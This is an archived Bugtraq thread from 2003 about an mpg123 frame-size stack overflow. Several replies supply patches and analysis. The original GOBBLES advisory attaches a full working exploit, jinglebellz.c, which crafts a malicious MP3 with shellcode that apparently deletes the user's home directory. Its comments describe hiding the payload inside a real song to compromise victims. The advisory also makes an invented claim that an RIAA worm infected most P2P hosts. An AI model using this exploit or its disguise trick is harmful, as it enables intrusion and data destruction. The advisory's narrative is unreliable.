88179 2003-01-16 19:29 /35 rader/ Benjamin Tober <btober0@hotmail.com>
Importerad: 2003-01-16 19:29 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3030>
Ärende: Re: Local/remote mpg123 exploit
------------------------------------------------------------
In-Reply-To: <200301131823.h0DINJbE014752@mailserver3.hushmail.com>
I'm not going to address the veracity of the narrative
text of this posting, however the exploit is real. I
believe that the patch to mpg123 given below closes
this particular hole. I have no affiliation with the
authors of mpg123 and haven't contacted them, but am
providing this patch now because an exploit is
publically available.
I can, if necessary, provide further explanation of the
exploit and the rationale behind the patch but will not
do so at this late hour. This patch is with respect to
mpg123-pre0.59s and is to the file common.c:
--- common.c.orig Wed Jan 15 02:16:08 2003
+++ common.c Wed Jan 15 02:18:52 2003
@@ -579,6 +579,11 @@
fprintf(stderr,"Sorry, unknown layer
type.\n");
return (0);
}
+ if (fr->framesize>MAX_INPUT_FRAMESIZE) {
+ fprintf(stderr,"Frame size too big.\n");
+ fr->framesize = MAX_INPUT_FRAMESIZE;
+ return 0;
+ }
if(!fr->bitrate_index) {
/* fprintf(stderr,"Warning, Free format not
heavily tested: (head %08lx)\n",newhead); */
Sincerely,
Benjamin Tober
(88179) /Benjamin Tober <btober0@hotmail.com>/------
88183 2003-01-16 20:00 /46 rader/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Importerad: 2003-01-16 20:00 av Brevbäraren
Extern mottagare: gobbles@hushmail.com
Externa svar till: 3APA3A@SECURITY.NNOV.RU
Mottagare: Bugtraq (import) <3034>
Ärende: Re: Local/remote mpg123 exploit
------------------------------------------------------------
Dear gobbles@hushmail.com,
Beside all the noise: it's trivial stack overflow due to invalid
maximum frame size calculation in mpg123. Maximum frame size is
defined to be 1792 (mpglib/mpg123.h) and 1920 (common.c where
overflow probably actually occures). Gobblez construct frame (160 *
144000)/8000 + 1 - 4 = 2877 bytes. Maximum frame may be
constructed is probably (384 * 144000)/16000 + 1 - 4 = 3453
bytes. Redefining MAX_INPUT_FRAMESIZE to 4096 should probably fix the
problem. mpg123.h (not one from mpglib, but one from mpg123
itself) already has MAXFRAMESIZE defined as 4096. It also could be
nice to add fr->framesize check. Fix below. I'm too lazy to test it.
If there are any programs using same mpglib they are vulnerable too.
--- common.old 2003-01-15 20:18:14.000000000 +0300
+++ common.c 2003-01-15 20:25:26.000000000 +0300
@@ -140,7 +140,7 @@
* -1: giving up
* 1: synched
*/
-#define MAX_INPUT_FRAMESIZE 1920
+#define MAX_INPUT_FRAMESIZE 4096
#define SYNC_HEAD_MASK 0xffff0000
#define SYNC_HEAD_MASK_FF 0x0000f000
#define LOOK_AHEAD_NUM 3
@@ -237,6 +237,8 @@
}
}
else {
+ if(frameInfo.framesize > MAX_INPUT_FRAMESIZE) return 0;
+
if(!rds->read_frame_body(rds,dummybuf,frameInfo.framesize))
return 0;
--Monday, January 13, 2003, 9:23:18 PM, you wrote to
bugtraq@securityfocus.com:
ghc> Affected Software: mpg123 (pre0.59s) http://www.mpg123.de
--
~/ZARAZA
You know my name - look up my number (Beatles)
(88183) /3APA3A <3APA3A@SECURITY.NNOV.RU>/(Ombruten)
88264 2003-01-17 17:41 /23 rader/ Daniel Kobras <kobras@tat.physik.uni-tuebingen.de>
Importerad: 2003-01-17 17:41 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3042>
Ärende: Re: Local/remote mpg123 exploit
------------------------------------------------------------
Hi!
I'd like to stress that the mpg123 exploit posted recently does not
affect versions up to 0.59r. The vulnerable code was added as part of
a rewrite of mpg123's prefetch. CVS checkouts after Oct. 25th, 2000
will be affected, as is the pre0.59s development snapshot. There has
been no stable release in that timeframe.
The exploitable code is accompanied by the following entry to
CHANGES, by the way:
- major change in the stream reader: support for free format
streams and better 'resync-on-error'. May still contain some bugs, so
please TEST and TEST and TEST ;)
Anyway, if you're running 0.59r, you're not vulnerable. (Well, not to
this exploit, at least.)
Regards,
Daniel.
(88264) /Daniel Kobras <kobras@tat.physik.uni-tuebingen.de>/(Ombruten)
Bilaga (application/pgp-signature) i text 88265
88265 2003-01-17 17:41 /8 rader/ Daniel Kobras <kobras@tat.physik.uni-tuebingen.de>
Importerad: 2003-01-17 17:41 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3043>
Bilaga (text/plain) till text 88264
Ärende: Bilaga till: Re: Local/remote mpg123 exploit
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+JdBPpOKIA4m/fisRAkyFAJwO9XK65s6beYNmLyXd5FmRWoINuACgkCvE
m1reXlQDdVSZVZN5uas1HFY=
=hGiw
-----END PGP SIGNATURE-----
(88265) /Daniel Kobras <kobras@tat.physik.uni-tuebingen.de>/
88266 2003-01-17 17:52 /95 rader/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Importerad: 2003-01-17 17:52 av Brevbäraren
Extern mottagare: Benjamin Tober <btober0@hotmail.com>
Externa svar till: 3APA3A@SECURITY.NNOV.RU
Mottagare: Bugtraq (import) <3044>
Kommentar till text 88179 av Benjamin Tober <btober0@hotmail.com>
Ärende: Re[2]: Local/remote mpg123 exploit
------------------------------------------------------------
Dear Benjamin Tober,
Latest release mpg123 0.59r uses large enough buffer size and may not
be exploited this way. But both versions have another one bug in
frame size calculation - zero bitrate will lead to negative
frame size to be calculated. Unchecked patches:
for 0.59r:
--- common.old 2003-01-15 21:42:15.000000000 +0300
+++ common.c 2003-01-15 21:42:38.000000000 +0300
@@ -123,7 +123,7 @@
return FALSE;
if(!((head>>17)&3))
return FALSE;
- if( ((head>>12)&0xf) == 0xf)
+ if( ((head>>12)&0xf) == 0xf || (head>>12)&0xf) == 0)
return FALSE;
if( ((head>>10)&0x3) == 0x3 )
return FALSE;
for pre0.59s:
--- common.old 2003-01-15 20:51:15.000000000 +0300
+++ common.c 2003-01-15 20:25:26.000000000 +0300
@@ -127,7 +127,7 @@
return FALSE;
if(!((head>>17)&3))
return FALSE;
- if( ((head>>12)&0xf) == 0xf || (head>>12)&0xf) == 0)
+ if( ((head>>12)&0xf) == 0xf)
return FALSE;
if( ((head>>10)&0x3) == 0x3 )
return FALSE;
@@ -140,7 +140,7 @@
* -1: giving up
* 1: synched
*/
-#define MAX_INPUT_FRAMESIZE 1920
+#define MAX_INPUT_FRAMESIZE 4096
#define SYNC_HEAD_MASK 0xffff0000
#define SYNC_HEAD_MASK_FF 0x0000f000
#define LOOK_AHEAD_NUM 3
@@ -237,6 +237,8 @@
}
}
else {
+ if(frameInfo.framesize > MAX_INPUT_FRAMESIZE) return 0;
+
if(!rds->read_frame_body(rds,dummybuf,frameInfo.framesize))
return 0;
--Wednesday, January 15, 2003, 11:16:24 AM, you wrote to
bugtraq@securityfocus.com:
BT> In-Reply-To:
<200301131823.h0DINJbE014752@mailserver3.hushmail.com>
BT> I'm not going to address the veracity of the narrative
BT> text of this posting, however the exploit is real. I
BT> believe that the patch to mpg123 given below closes
BT> this particular hole. I have no affiliation with the
BT> authors of mpg123 and haven't contacted them, but am
BT> providing this patch now because an exploit is
BT> publically available.
BT> I can, if necessary, provide further explanation of the
BT> exploit and the rationale behind the patch but will not
BT> do so at this late hour. This patch is with respect to
BT> mpg123-pre0.59s and is to the file common.c:
BT> --- common.c.orig Wed Jan 15 02:16:08 2003
BT> +++ common.c Wed Jan 15 02:18:52 2003
BT> @@ -579,6 +579,11 @@
BT> fprintf(stderr,"Sorry, unknown layer
BT> type.\n");
BT> return (0);
BT> }
BT> + if (fr->framesize>MAX_INPUT_FRAMESIZE) {
BT> + fprintf(stderr,"Frame size too big.\n");
BT> + fr->framesize = MAX_INPUT_FRAMESIZE;
BT> + return 0;
BT> + }
BT> if(!fr->bitrate_index) {
BT> /* fprintf(stderr,"Warning, Free format not
BT> heavily tested: (head %08lx)\n",newhead); */
BT> Sincerely,
BT> Benjamin Tober
--
~/ZARAZA
Áðîñüòå ñòàðàòüñÿ - íè÷åãî èç ýòîãî íå âûéäåò. (Òâåí)
(88266) /3APA3A <3APA3A@SECURITY.NNOV.RU>/(Ombruten)
88567 2003-01-21 23:22 /116 rader/ <gobbles@hushmail.com>
Importerad: 2003-01-21 23:22 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3128>
Ärende: Local/remote mpg123 exploit
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
___ ___ ___ ___ _ ___ ___ ___ ___ ___ _ _ ___ ___ _______
/ __|/ _ \| _ ) _ ) | | __/ __| / __| __/ __| | | | _ \_ _|_ _\ \ / /
| (_ | (_) | _ \ _ \ |__| _|\__ \ \__ \ _| (__| |_| | /| | | | \ V /
\___|\___/|___/___/____|___|___/ |___/___\___|\___/|_|_\___| |_| |_|
"Putting the honey in honeynet since '98."
Introduction: Several months ago, GOBBLES Security was recruited by
the RIAA (riaa.org) to invent, create, and finally deploy the future
of antipiracy tools. We focused on creating virii/worm hybrids to
infect and spread over p2p nets. Until we became RIAA contracters,
the best they could do was to passively monitor traffic. Our
contributions to the RIAA have given them the power to actively
control the majority of hosts using these networks.
We focused our research on vulnerabilities in audio and video
players. The idea was to come up with holes in various programs, so
that we could spread malicious media through the p2p networks, and
gain access to the host when the media was viewed.
During our research, we auditted and developed our hydra for the
following media tools: mplayer (www.mplayerhq.org) WinAMP
(www.winamp.com) Windows Media Player (www.microsoft.com) xine
(xine.sourceforge.net) mpg123 (www.mpg123.de) xmms (www.xmms.org)
After developing robust exploits for each, we presented this first
part of our research to the RIAA. They were pleased, and approved us
to continue to phase two of the project -- development of the
mechanism by which the infection will spread.
It took us about a month to develop the complex hydra, and another
month to bring it up to the standards of excellence that the RIAA
demanded of us. In the end, we submitted them what is perhaps the
most sophisticated tool for compromising millions of computers in
moments.
Our system works by first infecting a single host. It then
fingerprints a connecting host on the p2p network via passive traffic
analysis, and determines what the best possible method of infection
for that host would be. Then, the proper search results are sent back
to the "victim" (not the hard-working artists who p2p technology
rapes, and the RIAA protects). The user will then (hopefully)
download the infected media file off the RIAA server, and later play
it on their own machine.
When the player is exploited, a few things happen. First, all
p2p-serving software on the machine is infected, which will allow it
to infect other hosts on the p2p network. Next, all media on the
machine is cataloged, and the full list is sent back to the RIAA
headquarters (through specially crafted requests over the p2p
networks), where it is added to their records and stored until a
later time, when it can be used as evidence in criminal proceedings
against those criminals who think it's OK to break the law.
Our software worked better than even we hoped, and current reports
indicate that nearly 95% of all p2p-participating hosts are now
infected with the software that we developed for the RIAA.
Things to keep in mind:
1) If you participate in illegal file-sharing networks, your
computer now belongs to the RIAA.
2) Your BlackIce Defender(tm) firewall will not help you.
3) Snort, RealSecure, Dragon, NFR, and all that other crap
cannot detect this attack, or this type of attack.
4) Don't fuck with the RIAA again, scriptkids.
5) We have our own private version of this hydra actively
infecting p2p users, and building one giant ddosnet.
Due to our NDA with the RIAA, we are unable to give out any other
details concerning the technology that we developed for them, or the
details on any of the bugs that are exploited in our hydra.
However, as a demonstration of how this system works, we're providing
the academic security community with a single example exploit, for a
mpg123 bug that was found independantly of our work for the RIAA, and
is not covered under our agreement with the establishment.
Affected Software:
mpg123 (pre0.59s)
http://www.mpg123.de
Problem Type:
Local && Remote
Vendor Notification Status: The professional staff of GOBBLES
Security believe that by releasing our advisories without vendor
notification of any sort is cute and humorous, so this is also the
first time the vendor has been made aware of this problem. We hope
that you're as amused with our maturity as we are. ;PpPppPpPpPPPpP
Exploit Available:
Yes, attached below.
Technical Description of Problem:
Read the source.
Credits: Special thanks to stran9er@openwall.com for the
ethnic-cleansing shellcode.
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlwEARECABwFAj4jBA0VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP4gwA
oKmMyRIxA74KZfAVv3MsEBKCZxRMAJsFFhywKWzMoiT/Qiy4FV+r1inukA==
=OjMp
-----END PGP SIGNATURE-----
(88567) / <gobbles@hushmail.com>/---------(Ombruten)
Bilaga (application/octet-stream) i text 88568
Bilaga (text/plain) i text 88569
Kommentar i text 88183 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Kommentar i text 88264 av Daniel Kobras <kobras@tat.physik.uni-tuebingen.de>
88568 2003-01-21 23:22 /236 rader/ <gobbles@hushmail.com>
Bilagans filnamn: "jinglebellz.c"
Importerad: 2003-01-21 23:22 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3129>
Bilaga (text/plain) till text 88567
Ärende: Bilaga (jinglebellz.c) till: Local/remote mpg123 exploit
------------------------------------------------------------
/*
jinglebellz.c - local/remote exploit for mpg123
(c) 2003 GOBBLES Security seXForces
To use:
$ gcc -o jinglebellz jinglebellz.c
$ ./jinglebellz X own.mp3
(where X is the target number)
$ mpg123 own.mp3
If you need help finding specific targets for this
exploit:
$ ./jinglebellz 2 debug.mp3
$ gdb
(gdb) file mpg123
(gdb) r debug.mp3
(gdb) set $p=0xc0000000-4
(gdb) while(*$p!=0x41424348)
>set $p=$p-1
>end
(gdb) x/$p
0xbfff923c: 0x41424348
Add the new target to the source, recompile, and
try it out! You might want to supply your own
shellcode if you're going to use this to own your
friends <g>.
Fun things to do:
1) Create an evil.mp3 and append it to the end of a
"real" mp3, so that your victim gets to listen to
their favorite tunez before handing over access.
ex: $ ./jinglebellz X evil.mp3
$ cat evil.mp3 >>"NiN - The Day the Whole World Went Away.mp3"
2) Laugh at Theo for not providing md5sums for the contents of
ftp://ftp.openbsd.org/pub/OpenBSD/songs/, and continue laughing
at him for getting his boxes comprimised when "verifying" the
integrity of those mp3's. GOOD WORK THEO!@# *clap clap clap clap*
Special thanks to stran9er for the shellcode.
Remember, Napster is Communism, so fight for the American
way of life.
Quote:
"GOBBLES is so 2002" -- anonymous
^^^^^^^^^^^^^^^^^^^^
hehehehehehehe ;PPpPPPPPPppPPPPpP
Love,
GOBBLES
Special thanks to Dave Ahmed for supporting this release :>
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#define NORMAL_OVF
#define VERSION "0.1"
#define FALSE 0
#define TRUE 1
#define WRITE_ERROR { perror("write"); close(fd); exit(1); }
#define STATE { fprintf(stderr, "\n* header (%p) state: %x: ", header, state); state ++; ltb(header); }
#define MP3_SIZE (((160 * 144000)/8000) - 3) + 8
#define MAX_INPUT_FRAMESIZE 1920
unsigned char linux_shellcode[] = /* contributed by antiNSA */
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
"\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
"\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
"\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
"\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
"\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
"\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
"\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
"\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
"\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
"\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
"\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
"\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
"\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
"\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
"\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
"\x80\x31\xdb\x31\xc0\x40\xcd\x80";
struct xpl
{
unsigned char *name;
unsigned long addrloc; /* LOCATION of our intended func. ptr */
unsigned long allign;
unsigned char *sc;
size_t sclen;
} t[] =
{
{ "Prepare evil mp3 for SuSE 8.0", 0xbfff923c, 0, linux_shellcode, sizeof(linux_shellcode) },
{ "Prepare evil mp3 for Slackware 8.0", 0xbfff96f4, 0, linux_shellcode, sizeof(linux_shellcode) },
{ "Debug", 0x41424344, 0, linux_shellcode, sizeof(linux_shellcode) },
{ NULL, 0x00000000, 0, NULL, 0 }
};
int
head_check(unsigned long head)
{
if ((head & 0xffe00000) != 0xffe00000)
return FALSE;
if (!((head >> 17) & 3))
return FALSE;
if (((head >> 12) & 0xf) == 0xf)
return FALSE;
if (((head >> 10) & 0x3) == 0x3)
return FALSE;
return TRUE;
}
void
btb(unsigned char byte)
{
int shift;
unsigned int bit;
unsigned char mask;
for (shift = 7, mask = 0x80; shift >= 0; shift --, mask /= 2)
{
bit = 0;
bit = (byte & mask) >> shift;
fprintf(stderr, "%01d", bit);
if (shift == 4) fputc(' ', stderr);
}
fputc(' ', stderr);
}
void
ltb(unsigned long blah)
{
btb((unsigned char)((blah >> 24) & 0xff));
btb((unsigned char)((blah >> 16) & 0xff));
btb((unsigned char)((blah >> 8) & 0xff));
btb((unsigned char)(blah & 0xff));
}
int
main(int argc, char **argv)
{
int fd;
unsigned long header;
unsigned int i;
unsigned int state;
unsigned int tcount;
unsigned char l_buf[4];
fprintf(stderr, "@! Jinglebellz.c: mpg123 frame header handling
exploit, %s @!\n\n", VERSION);
if (argc < 3)
{
fprintf(stderr, "Usage: %s <target#> <evil.mp3 name>\n\nTarget list:\n\n", argv[0]);
for (tcount = 0; t[tcount].name != NULL; tcount ++) fprintf(stderr, "%d %s\n", tcount, t[tcount].name);
fputc('\n', stderr);
exit(0);
}
tcount = atoi(argv[1]);
if ((fd = open(argv[2], O_CREAT|O_WRONLY|O_TRUNC, 00700)) == -1)
{
perror("open");
exit(1);
}
state = 0;
fprintf(stderr, "+ filling bogus mp3 file\n");
for (i = 0; i < MP3_SIZE; i ++) if (write(fd, "A", 1) < 0) WRITE_ERROR;
fprintf(stderr, "+ preparing evil header");
header = 0xffe00000; /* start state */
STATE;
header |= 1 << 18; /* set bit 19, layer 2 */
STATE;
header |= 1 << 11; /* set bit 12, freqs index == 6 + (header>>10), se we end up with lowest freq (8000) */
STATE;
header |= 1 << 16; /* set fr->error_protection, (off) */
STATE;
header |= 1 << 13;
header |= 1 << 14;
header |= 1 << 15; /* bitrate index to highest possible (0xf-0x1) */
STATE;
header |= 1 << 9; /* fr->padding = ((newhead>>9)&0x1); */
STATE;
fprintf(stderr, "\n+ checking if header is valid: %s\n", head_check(header) == FALSE ? "NO" : "YES");
l_buf[3] = header & 0xff;
l_buf[2] = (header >> 8) & 0xff;
l_buf[1] = (header >> 16) & 0xff;
l_buf[0] = (header >> 24) & 0xff;
lseek(fd, 0, SEEK_SET);
if (write(fd, l_buf, sizeof(l_buf)) < 0) WRITE_ERROR;
fprintf(stderr, "+ addrloc: %p\n", t[tcount].addrloc);
l_buf[0] = ((t[tcount].addrloc + 0x04)) & 0xff;
l_buf[1] = ((t[tcount].addrloc + 0x04) >> 8) & 0xff;
l_buf[2] = ((t[tcount].addrloc + 0x04) >> 16) & 0xff;
l_buf[3] = ((t[tcount].addrloc + 0x04) >> 24) & 0xff;
if (write(fd, l_buf, sizeof(l_buf)) < 0) WRITE_ERROR;
lseek(fd, 0, SEEK_SET);
lseek(fd, MAX_INPUT_FRAMESIZE - t[tcount].sclen, SEEK_SET);
fprintf(stderr, "+ writing shellcode\n");
if (write(fd, t[tcount].sc, t[tcount].sclen) < 0) WRITE_ERROR;
for (i = 0; i < t[tcount].allign; i ++) if (write(fd, "A", 1) < 0) WRITE_ERROR;
#ifdef NORMAL_OVF
l_buf[0] = ((t[tcount].addrloc + MAX_INPUT_FRAMESIZE/2)) & 0xff;
l_buf[1] = ((t[tcount].addrloc + MAX_INPUT_FRAMESIZE/2) >> 8) & 0xff;
l_buf[2] = ((t[tcount].addrloc + MAX_INPUT_FRAMESIZE/2) >> 16) & 0xff;
l_buf[3] = ((t[tcount].addrloc + MAX_INPUT_FRAMESIZE/2) >> 24) & 0xff;
#else
l_buf[0] = ((t[tcount].addrloc - 0x08)) & 0xff;
l_buf[1] = ((t[tcount].addrloc - 0x08) >> 8) & 0xff;
l_buf[2] = ((t[tcount].addrloc - 0x08) >> 16) & 0xff;
l_buf[3] = ((t[tcount].addrloc - 0x08) >> 24) & 0xff;
#endif
for (i = MAX_INPUT_FRAMESIZE + t[tcount].allign; i < MP3_SIZE; i += 4)
{
if (write(fd, l_buf, sizeof(l_buf)) < 0) WRITE_ERROR;
}
lseek(fd, 0, SEEK_SET);
close(fd);
fprintf(stderr, "+ all done, %s is ready for use\n", argv[2]);
exit(0);
}
(88568) / <gobbles@hushmail.com>/---------(Ombruten)
88569 2003-01-21 23:22 /9 rader/ <gobbles@hushmail.com>
Bilagans filnamn: "jinglebellz.c.sig"
Importerad: 2003-01-21 23:22 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3130>
Bilaga (text/plain) till text 88567
Ärende: Bilaga (jinglebellz.c.sig) till: Local/remote mpg123 exploit
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wj8DBQA+IwO0HNGnlyGZsA8RAuusAJ49gGSCJzKlRpn+7b9vd+GYydWzUQCgjq3Ofe2n
WBnlQNf4GeyaFTit5N0=
=RBjc
-----END PGP SIGNATURE-----
(88569) / <gobbles@hushmail.com>/-------------------